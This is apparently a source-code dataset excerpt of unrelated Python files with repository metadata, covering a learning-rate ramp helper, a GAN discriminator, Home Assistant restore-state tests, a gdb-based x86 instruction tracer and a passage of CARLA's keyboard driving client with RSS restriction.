MatchingCone = cms.double(0.2),
IsolationCone = cms.double(0.5),
MinPtTracks = cms.double(1.)
)
| 29.5 | 58 | 0.688136 |
bfa278bb59d1549e6ccf357b506f6805ce53f6f9 | 381 | py | Python | edge/store_voltage.py | dannil10/dogger | 7e4570f1aa7d5393a9ae182498573d03fe1b61e9 | [
"MIT"
] | null | null | null | edge/store_voltage.py | dannil10/dogger | 7e4570f1aa7d5393a9ae182498573d03fe1b61e9 | [
"MIT"
] | null | null | null | edge/store_voltage.py | dannil10/dogger | 7e4570f1aa7d5393a9ae182498573d03fe1b61e9 | [
"MIT"
] | null | null | null | import gateway.queue
numpy_sql = gateway.queue.NumpyFile(
channels = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32},
start_delay = 0,
file_path = '/home/heta/Z/data/files/voltage/',
files_to_keep = 0,
config_filepath = '/home/heta/Z/app/python/dogger/',
config_filename = 'conf.ini')
numpy_sql.run()
| 29.307692 | 105 | 0.64042 |
6185266ecebd460d6d802beff43d35f3182979e4 | 3,021 | py | Python | ramps.py | Stomach-ache/MixPUL | 96ecbbdcae4fbfc57e77fdaf62b197e6b81657c0 | [
"MIT"
] | 4 | 2019-09-17T08:48:09.000Z | 2022-03-19T01:57:29.000Z | ramps.py | Stomach-ache/MixPUL | 96ecbbdcae4fbfc57e77fdaf62b197e6b81657c0 | [
"MIT"
] | 1 | 2019-09-17T08:48:55.000Z | 2019-09-17T08:48:55.000Z | ramps.py | Stomach-ache/MixPUL | 96ecbbdcae4fbfc57e77fdaf62b197e6b81657c0 | [
"MIT"
] | null | null | null | # Copyright (c) 2018, Curious AI Ltd. All rights reserved.
#
# This work is licensed under the Creative Commons Attribution-NonCommercial
# 4.0 International License. To view a copy of this license, visit
# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to
# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.
"""Functions for ramping hyperparameters up or down
Each function takes the current training step or epoch, and the
ramp length in the same format, and returns a multiplier between
0 and 1.
"""
import numpy as np
def sigmoid_rampup(current, rampup_length):
"""Exponential rampup from https://arxiv.org/abs/1610.02242"""
if rampup_length == 0:
return 1.0
else:
current = np.clip(current, 0.0, rampup_length)
phase = 1.0 - current / rampup_length
return float(np.exp(-5.0 * phase * phase))
def linear_rampup(current, rampup_length):
"""Linear rampup"""
assert current >= 0 and rampup_length >= 0
if current >= rampup_length:
lr = 1.0
else:
lr = current / rampup_length
#print (lr)
return lr
def cosine_rampdown(current, rampdown_length):
"""Cosine rampdown from https://arxiv.org/abs/1608.03983"""
assert 0 <= current <= rampdown_length
return float(.5 * (np.cos(np.pi * current / rampdown_length) + 1))
if __name__ == '__main__':
import numpy as np
import matplotlib.pyplot as plt
#x = np.zeros(100)
#for i in range(100):
# x[i]=sigmoid_rampup(i, 50)
lr_list = []
"""
def adjust_learning_rate(epoch, step_in_epoch, total_steps_in_epoch):
lr =0.4
lr_rampup = 5.0
initial_lr = 0.1
lr_rampdown_epochs = 45
epoch = epoch + step_in_epoch / total_steps_in_epoch
# LR warm-up to handle large minibatch sizes from https://arxiv.org/abs/1706.02677
lr = linear_rampup(epoch, lr_rampup) * (lr - initial_lr) + initial_lr
# Cosine LR rampdown from https://arxiv.org/abs/1608.03983 (but one cycle only)
if lr_rampdown_epochs:
assert lr_rampdown_epochs >= epoch
lr *= cosine_rampdown(epoch, lr_rampdown_epochs)
return lr
"""
def adjust_learning_rate(epoch, lr_sch, step_in_epoch, total_steps_in_epoch):
lr =0.4
lr_rampup = 5.0
initial_lr = 0.1
epoch = epoch + step_in_epoch / total_steps_in_epoch
print (epoch)
# LR warm-up to handle large minibatch sizes from https://arxiv.org/abs/1706.02677
lr = linear_rampup(epoch, lr_rampup) * (lr - initial_lr) + initial_lr
lr = lr * (0.1 ** (epoch // lr_sch))
return lr
for epoch in range(20):
for step_in_epoch in range(5):
lr_temp = adjust_learning_rate(epoch, 6, step_in_epoch, 5)
lr_list.append(lr_temp)
#plt.ylim(1.0)
plt.plot(np.asarray(lr_list))
plt.show()
| 30.21 | 90 | 0.626945 |
c183af7ffeb6468accd5c7a53c5d78328bade4a7 | 1,711 | py | Python | generator/models/discriminator.py | universuen/pokemon_GAN | ac983270820cf55a3eeb74a0d0edd258e715d00b | [
"MIT"
] | 1 | 2021-06-10T11:26:57.000Z | 2021-06-10T11:26:57.000Z | generator/models/discriminator.py | universuen/pokemon_WGAN | ac983270820cf55a3eeb74a0d0edd258e715d00b | [
"MIT"
] | null | null | null | generator/models/discriminator.py | universuen/pokemon_WGAN | ac983270820cf55a3eeb74a0d0edd258e715d00b | [
"MIT"
] | null | null | null | import torch
from torch import nn
def init_weights(layer: nn.Module):
layer_name = layer.__class__.__name__
if 'Conv' in layer_name:
nn.init.normal_(layer.weight.data, 0.0, 0.02)
elif layer_name == 'Linear':
nn.init.normal_(layer.weight.data, 0.0, 0.02)
elif 'Norm' in layer_name:
nn.init.normal_(layer.weight.data, 1.0, 0.02)
nn.init.constant_(layer.bias.data, 0)
class Discriminator(nn.Module):
def __init__(self):
super().__init__()
self.model = nn.Sequential(
# 3 * 128 * 128
nn.Conv2d(3, 32, 4, 2, 1, bias=False),
nn.GroupNorm(2, 32),
nn.LeakyReLU(0.2, inplace=True),
# 32 * 64 * 64
nn.Conv2d(32, 64, 4, 2, 1, bias=False),
nn.GroupNorm(4, 64),
nn.LeakyReLU(0.2, inplace=True),
# 64 * 32 * 32
nn.Conv2d(64, 128, 4, 2, 1, bias=False),
nn.GroupNorm(8, 128),
nn.LeakyReLU(0.2, inplace=True),
# 128 * 16 * 16
nn.Conv2d(128, 256, 4, 2, 1, bias=False),
nn.GroupNorm(16, 256),
nn.LeakyReLU(0.2, inplace=True),
# 256 * 8 * 8
nn.Conv2d(256, 512, 4, 2, 1, bias=False),
nn.GroupNorm(32, 512),
nn.LeakyReLU(0.2, inplace=True),
# 512 * 4 * 4
nn.Conv2d(512, 1024, 4, 1, 0, bias=False),
# 1024 * 1 * 1
nn.Flatten(),
nn.Linear(1024, 32, bias=False),
nn.LeakyReLU(0.2, inplace=True),
nn.Linear(32, 1, bias=False),
)
self.apply(init_weights)
def forward(self, x: torch.Tensor):
return self.model(x)
| 32.283019 | 54 | 0.511981 |
ff38e8fb7637cbef5c48a94bf71693f0658abb3d | 8,469 | py | Python | tests/helpers/test_restore_state.py | zalke/home-assistant | a31e49c857722c0723dc5297cd83cbce0f8716f6 | [
"Apache-2.0"
] | 4 | 2019-07-03T22:36:57.000Z | 2019-08-10T15:33:25.000Z | tests/helpers/test_restore_state.py | zalke/home-assistant | a31e49c857722c0723dc5297cd83cbce0f8716f6 | [
"Apache-2.0"
] | 7 | 2019-08-23T05:26:02.000Z | 2022-03-11T23:57:18.000Z | tests/helpers/test_restore_state.py | zalke/home-assistant | a31e49c857722c0723dc5297cd83cbce0f8716f6 | [
"Apache-2.0"
] | null | null | null | """The tests for the Restore component."""
from datetime import datetime
from homeassistant.const import EVENT_HOMEASSISTANT_START
from homeassistant.core import CoreState, State
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.restore_state import (
RestoreStateData, RestoreEntity, StoredState, DATA_RESTORE_STATE_TASK,
STORAGE_KEY)
from homeassistant.util import dt as dt_util
from asynctest import patch
from tests.common import mock_coro
async def test_caching_data(hass):
"""Test that we cache data."""
now = dt_util.utcnow()
stored_states = [
StoredState(State('input_boolean.b0', 'on'), now),
StoredState(State('input_boolean.b1', 'on'), now),
StoredState(State('input_boolean.b2', 'on'), now),
]
data = await RestoreStateData.async_get_instance(hass)
await data.store.async_save([state.as_dict() for state in stored_states])
# Emulate a fresh load
hass.data[DATA_RESTORE_STATE_TASK] = None
entity = RestoreEntity()
entity.hass = hass
entity.entity_id = 'input_boolean.b1'
# Mock that only b1 is present this run
with patch('homeassistant.helpers.restore_state.Store.async_save'
) as mock_write_data:
state = await entity.async_get_last_state()
assert state is not None
assert state.entity_id == 'input_boolean.b1'
assert state.state == 'on'
assert mock_write_data.called
async def test_hass_starting(hass):
"""Test that we cache data."""
hass.state = CoreState.starting
now = dt_util.utcnow()
stored_states = [
StoredState(State('input_boolean.b0', 'on'), now),
StoredState(State('input_boolean.b1', 'on'), now),
StoredState(State('input_boolean.b2', 'on'), now),
]
data = await RestoreStateData.async_get_instance(hass)
await data.store.async_save([state.as_dict() for state in stored_states])
# Emulate a fresh load
hass.data[DATA_RESTORE_STATE_TASK] = None
entity = RestoreEntity()
entity.hass = hass
entity.entity_id = 'input_boolean.b1'
# Mock that only b1 is present this run
states = [
State('input_boolean.b1', 'on'),
]
with patch('homeassistant.helpers.restore_state.Store.async_save'
) as mock_write_data, patch.object(
hass.states, 'async_all', return_value=states):
state = await entity.async_get_last_state()
assert state is not None
assert state.entity_id == 'input_boolean.b1'
assert state.state == 'on'
# Assert that no data was written yet, since hass is still starting.
assert not mock_write_data.called
# Finish hass startup
with patch('homeassistant.helpers.restore_state.Store.async_save'
) as mock_write_data:
hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
await hass.async_block_till_done()
# Assert that this session states were written
assert mock_write_data.called
async def test_dump_data(hass):
"""Test that we cache data."""
states = [
State('input_boolean.b0', 'on'),
State('input_boolean.b1', 'on'),
State('input_boolean.b2', 'on'),
]
entity = Entity()
entity.hass = hass
entity.entity_id = 'input_boolean.b0'
await entity.async_internal_added_to_hass()
entity = RestoreEntity()
entity.hass = hass
entity.entity_id = 'input_boolean.b1'
await entity.async_internal_added_to_hass()
data = await RestoreStateData.async_get_instance(hass)
now = dt_util.utcnow()
data.last_states = {
'input_boolean.b0': StoredState(State('input_boolean.b0', 'off'), now),
'input_boolean.b1': StoredState(State('input_boolean.b1', 'off'), now),
'input_boolean.b2': StoredState(State('input_boolean.b2', 'off'), now),
'input_boolean.b3': StoredState(State('input_boolean.b3', 'off'), now),
'input_boolean.b4': StoredState(
State('input_boolean.b4', 'off'),
datetime(1985, 10, 26, 1, 22, tzinfo=dt_util.UTC)),
}
with patch('homeassistant.helpers.restore_state.Store.async_save'
) as mock_write_data, patch.object(
hass.states, 'async_all', return_value=states):
await data.async_dump_states()
assert mock_write_data.called
args = mock_write_data.mock_calls[0][1]
written_states = args[0]
# b0 should not be written, since it didn't extend RestoreEntity
# b1 should be written, since it is present in the current run
# b2 should not be written, since it is not registered with the helper
# b3 should be written, since it is still not expired
# b4 should not be written, since it is now expired
assert len(written_states) == 2
assert written_states[0]['state']['entity_id'] == 'input_boolean.b1'
assert written_states[0]['state']['state'] == 'on'
assert written_states[1]['state']['entity_id'] == 'input_boolean.b3'
assert written_states[1]['state']['state'] == 'off'
# Test that removed entities are not persisted
await entity.async_remove()
with patch('homeassistant.helpers.restore_state.Store.async_save'
) as mock_write_data, patch.object(
hass.states, 'async_all', return_value=states):
await data.async_dump_states()
assert mock_write_data.called
args = mock_write_data.mock_calls[0][1]
written_states = args[0]
assert len(written_states) == 1
assert written_states[0]['state']['entity_id'] == 'input_boolean.b3'
assert written_states[0]['state']['state'] == 'off'
async def test_dump_error(hass):
"""Test that we cache data."""
states = [
State('input_boolean.b0', 'on'),
State('input_boolean.b1', 'on'),
State('input_boolean.b2', 'on'),
]
entity = Entity()
entity.hass = hass
entity.entity_id = 'input_boolean.b0'
await entity.async_internal_added_to_hass()
entity = RestoreEntity()
entity.hass = hass
entity.entity_id = 'input_boolean.b1'
await entity.async_internal_added_to_hass()
data = await RestoreStateData.async_get_instance(hass)
with patch('homeassistant.helpers.restore_state.Store.async_save',
return_value=mock_coro(exception=HomeAssistantError)
) as mock_write_data, patch.object(
hass.states, 'async_all', return_value=states):
await data.async_dump_states()
assert mock_write_data.called
async def test_load_error(hass):
"""Test that we cache data."""
entity = RestoreEntity()
entity.hass = hass
entity.entity_id = 'input_boolean.b1'
with patch('homeassistant.helpers.storage.Store.async_load',
return_value=mock_coro(exception=HomeAssistantError)):
state = await entity.async_get_last_state()
assert state is None
async def test_state_saved_on_remove(hass):
"""Test that we save entity state on removal."""
entity = RestoreEntity()
entity.hass = hass
entity.entity_id = 'input_boolean.b0'
await entity.async_internal_added_to_hass()
hass.states.async_set('input_boolean.b0', 'on')
data = await RestoreStateData.async_get_instance(hass)
# No last states should currently be saved
assert not data.last_states
await entity.async_remove()
# We should store the input boolean state when it is removed
assert data.last_states['input_boolean.b0'].state.state == 'on'
async def test_restoring_invalid_entity_id(hass, hass_storage):
"""Test restoring invalid entity IDs."""
entity = RestoreEntity()
entity.hass = hass
entity.entity_id = 'test.invalid__entity_id'
now = dt_util.utcnow().isoformat()
hass_storage[STORAGE_KEY] = {
'version': 1,
'key': STORAGE_KEY,
'data': [
{
'state': {
'entity_id': 'test.invalid__entity_id',
'state': 'off',
'attributes': {},
'last_changed': now,
'last_updated': now,
'context': {
'id': '3c2243ff5f30447eb12e7348cfd5b8ff',
'user_id': None
}
},
'last_seen': dt_util.utcnow().isoformat()
}
]
}
state = await entity.async_get_last_state()
assert state is None
| 33.474308 | 79 | 0.659818 |
9d2e479a96dff389d20be201f351ce832d5bf928 | 4,619 | py | Python | tests/auto/trace.py | Srinivas11789/manticore | af3c6aada811833864efaccef7477f14e9b5e0dd | [
"Apache-2.0"
] | null | null | null | tests/auto/trace.py | Srinivas11789/manticore | af3c6aada811833864efaccef7477f14e9b5e0dd | [
"Apache-2.0"
] | null | null | null | tests/auto/trace.py | Srinivas11789/manticore | af3c6aada811833864efaccef7477f14e9b5e0dd | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import copy
import sys
import sys
import time
import subprocess
from distorm3 import Decompose, Decode16Bits, Decode32Bits, Decode64Bits, Mnemonics, Registers
count = 0
class Gdb(subprocess.Popen):
def __init__(self, prg, prompt='(gdb) '):
"""Construct interactive Popen."""
self.prompt = prompt
subprocess.Popen.__init__(self, ['gdb', prg], stdin=subprocess.PIPE, stdout=subprocess.PIPE , stderr=subprocess.STDOUT)
def correspond(self, text):
"""Communicate with the child process without closing stdin."""
self.stdin.write(text)
self.stdin.flush()
str_buffer = ''
while not str_buffer.endswith(self.prompt):
str_buffer += self.stdout.read(1)
return str_buffer
def getR(self, reg):
reg = "$"+reg
if "XMM" in reg:
reg = reg+".uint128"
val = self.correspond('p %s\n'%reg.lower()).split("=")[-1].split("\n")[0]
if "0x" in val:
return int(val.split("0x")[-1],16)
else:
return int(val)
if "FLAG" in reg:
reg = "(unsigned) "+reg
if reg in ['$R%dB'%i for i in range(16)] :
reg = reg[:-1] + "&0xff"
if reg in ['$R%dW'%i for i in range(16)] :
reg = reg[:-1] + "&0xffff"
val = self.correspond('p /x %s\n'%reg.lower()).split("0x")[-1]
return long(val.split("\n")[0],16)
def setR(self, reg, value):
self.correspond('set $%s = %s\n'%(reg.lower(), int(value)))
def setByte(self, m, value):
self.correspond('set *(char*)(%s) = %s\n'%(m,value))
def stepi(self):
#print self.correspond("x/i $pc\n")
self.correspond("stepi\n")
def getM(self, m):
try:
return long(self.correspond('x/xg %s\n'%m).split("\t")[-1].split("0x")[-1].split("\n")[0],16)
except Exception as e:
print('x/xg %s\n'%m)
print(self.correspond('x/xg %s\n'%m))
raise e
return 0
def getPid(self):
return int(self.correspond('info proc\n').split("\n")[0].split(" ")[-1])
def getStack(self):
maps = file("/proc/%s/maps"%self.correspond('info proc\n').split("\n")[0].split(" ")[-1]).read().split("\n")
i,o = [ int(x,16) for x in maps[-3].split(" ")[0].split('-')]
print(self.correspond('dump mem lala 0x%x 0x%x\n'%(i,o)))
def getByte(self, m):
arch = self.get_arch()
mask = {'i386': 0xffffffff, 'amd64': 0xffffffffffffffff}[arch]
return int(self.correspond("x/1bx %d\n"%(m&mask)).split("\t")[-1].split("\n")[0][2:],16)
def get_entry(self):
a=self.correspond('info target\n')
return int(a[a.find("Entry point:"):].split('\n')[0].split(' ')[-1][2:],16)
_arch = None
def get_arch(self):
if self._arch is not None:
return self._arch
infotarget = self.correspond('info target\n')
if 'elf32-i386' in infotarget:
self._arch = 'i386'
return 'i386'
elif 'elf64-x86-64' in infotarget:
self._arch = 'amd64'
return 'amd64'
else:
print(infotarget)
raise NotImplementedError()
gdb = Gdb(sys.argv[1])
arch = gdb.correspond('')
#guess arch
arch = gdb.get_arch()
#guess architecture from file
entry = gdb.get_entry()
gdb.correspond("b *0\n")
gdb.correspond("run arg1 arg2 arg3 < /dev/urandom > /dev/null\n")
gdb.correspond("d 1\n")
# Simulate no vdso (As when analyzed with symbemu)
found = 0
for i in range(75,120):
if gdb.getM('$sp+sizeof(void*)*%d'%i) ==0x19 and gdb.getM('$sp+%d'%(i+2))==0x1f:
found = i
if found !=0:
gdb.setByte('$sp+sizeof(void*)*%d'%found,1)
gdb.setByte('$sp+sizeof(void*)*%d'%(found+2),1)
vdso = gdb.getM('$sp+sizeof(void*)*%d'%(found+1))
for i in range(75,120):
val = gdb.getM('$sp+sizeof(void*)*%d'%i)
if val > vdso-0x10000 and val <= vdso+0x10000:
if (gdb.getM('$sp+sizeof(void*)*%d'%(i-1))) != 1:
gdb.setByte('$sp+sizeof(void*)*%d'%(i-1),1)
STACK_INSTRUCTIONS = ['BOUND', 'CALL', 'CALLF', 'ENTER', 'INT', 'INT1', 'INTO', 'IRET', 'IRETD', 'LEAVE', 'POP', 'POPA', 'POPAD', 'POPF', 'POPFD', 'PUSH', 'PUSHA', 'PUSHAD', 'PUSHF', 'PUSHFD', 'RETF', 'RETN', 'RET']
while True:
try:
stepped = False
pc = gdb.getR({'i386': 'EIP', 'amd64': 'RIP'}[arch])
print(hex(pc))
gdb.stepi()
print(gdb.correspond('info registers\n'))
except Exception as e:
print(e)
print("# Processed %d instructions." % count)
| 35.259542 | 215 | 0.556181 |
5fe0a022a25836ade1244d2c385140177caf85f1 | 41,817 | py | Python | roadscene2vec/data/gen/PythonAPI/examples/manual_control_rss.py | AICPS/roadscene2vec | aea84d3aa0e339a58fd92bbee3140df9fa4abde8 | [
"MIT"
] | 8 | 2021-09-03T01:02:48.000Z | 2022-03-15T09:14:31.000Z | roadscene2vec/data/gen/PythonAPI/examples/manual_control_rss.py | waterbearbee/roadscene2vec | aea84d3aa0e339a58fd92bbee3140df9fa4abde8 | [
"MIT"
] | 4 | 2021-09-02T22:23:25.000Z | 2022-02-22T06:39:56.000Z | roadscene2vec/data/gen/PythonAPI/examples/manual_control_rss.py | waterbearbee/roadscene2vec | aea84d3aa0e339a58fd92bbee3140df9fa4abde8 | [
"MIT"
] | 3 | 2022-01-23T09:05:48.000Z | 2022-03-31T21:04:28.000Z | #!/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
# Copyright (c) 2019 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
# Allows controlling a vehicle with a keyboard. For a simpler and more
# documented example, please take a look at tutorial.py.
"""
Welcome to CARLA manual control.
Use ARROWS or WASD keys for control.
W : throttle
S : brake
AD : steer
Q : toggle reverse
Space : hand-brake
P : toggle autopilot
M : toggle manual transmission
,/. : gear up/down
T : toggle RSS restrictor
TAB : change sensor position
` : next sensor
[1-9] : change to sensor [1-9]
C : change weather (Shift+C reverse)
Backspace : change vehicle
R : toggle recording images to disk
CTRL + R : toggle recording of simulation (replacing any previous)
CTRL + P : start replaying last recorded simulation
CTRL + + : increments the start time of the replay by 1 second (+SHIFT = 10 seconds)
CTRL + - : decrements the start time of the replay by 1 second (+SHIFT = 10 seconds)
F1 : toggle HUD
H/? : toggle help
ESC : quit
"""
from __future__ import print_function
import glob
import os
import sys
# ==============================================================================
# -- find carla module ---------------------------------------------------------
# ==============================================================================
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
# ==============================================================================
# -- imports -------------------------------------------------------------------
# ==============================================================================
import carla
from carla import ColorConverter as cc
import argparse
import collections
import datetime
import inspect
import logging
import math
import random
import re
import weakref
try:
import pygame
from pygame.locals import KMOD_CTRL
from pygame.locals import KMOD_SHIFT
from pygame.locals import K_0
from pygame.locals import K_9
from pygame.locals import K_BACKQUOTE
from pygame.locals import K_BACKSPACE
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_TAB
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_c
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_t
from pygame.locals import K_w
from pygame.locals import K_MINUS
from pygame.locals import K_EQUALS
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
# ==============================================================================
# -- Global functions ----------------------------------------------------------
# ==============================================================================
def find_weather_presets():
rgx = re.compile('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)')
name = lambda x: ' '.join(m.group(0) for m in rgx.finditer(x))
presets = [x for x in dir(carla.WeatherParameters) if re.match('[A-Z].+', x)]
return [(getattr(carla.WeatherParameters, x), name(x)) for x in presets]
def get_actor_display_name(actor, truncate=250):
name = ' '.join(actor.type_id.replace('_', '.').title().split('.')[1:])
return (name[:truncate - 1] + u'\u2026') if len(name) > truncate else name
# ==============================================================================
# -- World ---------------------------------------------------------------------
# ==============================================================================
class World(object):
def __init__(self, carla_world, hud, actor_filter, actor_role_name='hero'):
self.world = carla_world
self.actor_role_name = actor_role_name
self.map = self.world.get_map()
self.hud = hud
self.player = None
self.collision_sensor = None
self.lane_invasion_sensor = None
self.gnss_sensor = None
self.rss_sensor = None
self.camera_manager = None
self._weather_presets = find_weather_presets()
self._weather_index = 0
self._actor_filter = actor_filter
self.restart()
self.world.on_tick(hud.on_world_tick)
self.recording_enabled = False
self.recording_start = 0
def restart(self):
# Keep same camera config if the camera manager exists.
cam_index = self.camera_manager.index if self.camera_manager is not None else 0
cam_pos_index = self.camera_manager.transform_index if self.camera_manager is not None else 0
# Get a random blueprint.
blueprint = random.choice(self.world.get_blueprint_library().filter(self._actor_filter))
blueprint.set_attribute('role_name', self.actor_role_name)
if blueprint.has_attribute('color'):
color = random.choice(blueprint.get_attribute('color').recommended_values)
blueprint.set_attribute('color', color)
if blueprint.has_attribute('driver_id'):
driver_id = random.choice(blueprint.get_attribute('driver_id').recommended_values)
blueprint.set_attribute('driver_id', driver_id)
if blueprint.has_attribute('is_invincible'):
blueprint.set_attribute('is_invincible', 'true')
# Spawn the player.
if self.player is not None:
spawn_point = self.player.get_transform()
spawn_point.location.z += 2.0
spawn_point.rotation.roll = 0.0
spawn_point.rotation.pitch = 0.0
self.destroy()
self.player = self.world.try_spawn_actor(blueprint, spawn_point)
while self.player is None:
spawn_points = self.map.get_spawn_points()
spawn_point = random.choice(spawn_points) if spawn_points else carla.Transform()
self.player = self.world.try_spawn_actor(blueprint, spawn_point)
# Set up the sensors.
self.collision_sensor = CollisionSensor(self.player, self.hud)
self.lane_invasion_sensor = LaneInvasionSensor(self.player, self.hud)
self.gnss_sensor = GnssSensor(self.player)
self.rss_sensor = RssSensor(self.player)
self.camera_manager = CameraManager(self.player, self.hud)
self.camera_manager.transform_index = cam_pos_index
self.camera_manager.set_sensor(cam_index, notify=False)
actor_type = get_actor_display_name(self.player)
self.hud.notification(actor_type)
def next_weather(self, reverse=False):
self._weather_index += -1 if reverse else 1
self._weather_index %= len(self._weather_presets)
preset = self._weather_presets[self._weather_index]
self.hud.notification('Weather: %s' % preset[1])
self.player.get_world().set_weather(preset[0])
def tick(self, clock):
self.hud.tick(self, clock)
def render(self, display):
self.camera_manager.render(display)
self.hud.render(display)
def destroy_sensors(self):
self.camera_manager.sensor.destroy()
self.camera_manager.sensor = None
self.camera_manager.index = None
def destroy(self):
actors = [
self.camera_manager.sensor,
self.collision_sensor.sensor,
self.lane_invasion_sensor.sensor,
self.gnss_sensor.sensor]
if self.rss_sensor:
actors.append(self.rss_sensor.sensor)
actors.append(self.player)
for actor in actors:
if actor is not None:
actor.destroy()
# ==============================================================================
# -- KeyboardControl -----------------------------------------------------------
# ==============================================================================
class KeyboardControl(object):
def __init__(self, world, args):
self._autopilot_enabled = args.autopilot
self._world = world
self._restrictor = None
self._restrictorEnabled = True
if isinstance(world.player, carla.Vehicle):
self._control = carla.VehicleControl()
world.player.set_autopilot(self._autopilot_enabled)
self._restrictor = carla.RssRestrictor()
elif isinstance(world.player, carla.Walker):
self._control = carla.WalkerControl()
self._autopilot_enabled = False
self._rotation = world.player.get_transform().rotation
else:
raise NotImplementedError("Actor type not supported")
self._steer_cache = 0.0
world.hud.notification("Press 'H' or '?' for help.", seconds=4.0)
def parse_events(self, client, world, clock):
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if self._is_quit_shortcut(event.key):
return True
elif event.key == K_BACKSPACE:
world.restart()
elif event.key == K_F1:
world.hud.toggle_info()
elif event.key == K_h or (event.key == K_SLASH and pygame.key.get_mods() & KMOD_SHIFT):
world.hud.help.toggle()
elif event.key == K_TAB:
world.camera_manager.toggle_camera()
elif event.key == K_c and pygame.key.get_mods() & KMOD_SHIFT:
world.next_weather(reverse=True)
elif event.key == K_c:
world.next_weather()
elif event.key == K_BACKQUOTE:
world.camera_manager.next_sensor()
elif event.key > K_0 and event.key <= K_9:
world.camera_manager.set_sensor(event.key - 1 - K_0)
elif event.key == K_r and not (pygame.key.get_mods() & KMOD_CTRL):
world.camera_manager.toggle_recording()
elif event.key == K_r and (pygame.key.get_mods() & KMOD_CTRL):
if (world.recording_enabled):
client.stop_recorder()
world.recording_enabled = False
world.hud.notification("Recorder is OFF")
else:
client.start_recorder("manual_recording.rec")
world.recording_enabled = True
world.hud.notification("Recorder is ON")
elif event.key == K_p and (pygame.key.get_mods() & KMOD_CTRL):
# stop recorder
client.stop_recorder()
world.recording_enabled = False
# work around to fix camera at start of replaying
currentIndex = world.camera_manager.index
world.destroy_sensors()
# disable autopilot
self._autopilot_enabled = False
world.player.set_autopilot(self._autopilot_enabled)
world.hud.notification("Replaying file 'manual_recording.rec'")
# replayer
client.replay_file("manual_recording.rec", world.recording_start, 0, 0)
world.camera_manager.set_sensor(currentIndex)
elif event.key == K_MINUS and (pygame.key.get_mods() & KMOD_CTRL):
if pygame.key.get_mods() & KMOD_SHIFT:
world.recording_start -= 10
else:
world.recording_start -= 1
world.hud.notification("Recording start time is %d" % (world.recording_start))
elif event.key == K_EQUALS and (pygame.key.get_mods() & KMOD_CTRL):
if pygame.key.get_mods() & KMOD_SHIFT:
world.recording_start += 10
else:
world.recording_start += 1
world.hud.notification("Recording start time is %d" % (world.recording_start))
if isinstance(self._control, carla.VehicleControl):
if event.key == K_q:
self._control.gear = 1 if self._control.reverse else -1
elif event.key == K_m:
self._control.manual_gear_shift = not self._control.manual_gear_shift
self._control.gear = world.player.get_control().gear
world.hud.notification('%s Transmission' %
('Manual' if self._control.manual_gear_shift else 'Automatic'))
elif self._control.manual_gear_shift and event.key == K_COMMA:
self._control.gear = max(-1, self._control.gear - 1)
elif self._control.manual_gear_shift and event.key == K_PERIOD:
self._control.gear = self._control.gear + 1
elif event.key == K_p and not (pygame.key.get_mods() & KMOD_CTRL):
self._autopilot_enabled = not self._autopilot_enabled
world.player.set_autopilot(self._autopilot_enabled)
world.hud.notification('Autopilot %s' % ('On' if self._autopilot_enabled else 'Off'))
elif event.key == K_t:
self._restrictorEnabled = not self._restrictorEnabled
world.hud.notification('RSS Restrictor %s' % ('On' if self._restrictorEnabled else 'Off'))
if not self._autopilot_enabled:
if isinstance(self._control, carla.VehicleControl):
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
self._control.reverse = self._control.gear < 0
vehicle_control = self._control
world.hud.original_vehicle_control = vehicle_control
world.hud.restricted_vehicle_control = vehicle_control
if self._restrictor and self._restrictorEnabled:
rss_restriction = self._world.rss_sensor.acceleration_restriction if self._world.rss_sensor and self._world.rss_sensor.response_valid else None
if rss_restriction:
rss_ego_velocity = self._world.rss_sensor.ego_velocity
vehicle_physics = world.player.get_physics_control()
if not (pygame.key.get_mods() & KMOD_CTRL):
vehicle_control = self._restrictor.restrictVehicleControl(vehicle_control, rss_restriction, rss_ego_velocity, vehicle_physics)
world.hud.restricted_vehicle_control = vehicle_control
world.player.apply_control(vehicle_control)
elif isinstance(self._control, carla.WalkerControl):
self._parse_walker_keys(pygame.key.get_pressed(), clock.get_time())
world.player.apply_control(self._control)
def _parse_vehicle_keys(self, keys, milliseconds):
self._control.throttle = 1.0 if keys[K_UP] or keys[K_w] else 0.0
steer_increment = 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
if self._steer_cache > 0:
self._steer_cache = 0
else:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
if self._steer_cache < 0:
self._steer_cache = 0
else:
self._steer_cache += steer_increment
else:
self._steer_cache = 0.0
self._steer_cache = min(0.7, max(-0.7, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0
self._control.hand_brake = keys[K_SPACE]
def _parse_walker_keys(self, keys, milliseconds):
self._control.speed = 0.0
if keys[K_DOWN] or keys[K_s]:
self._control.speed = 0.0
if keys[K_LEFT] or keys[K_a]:
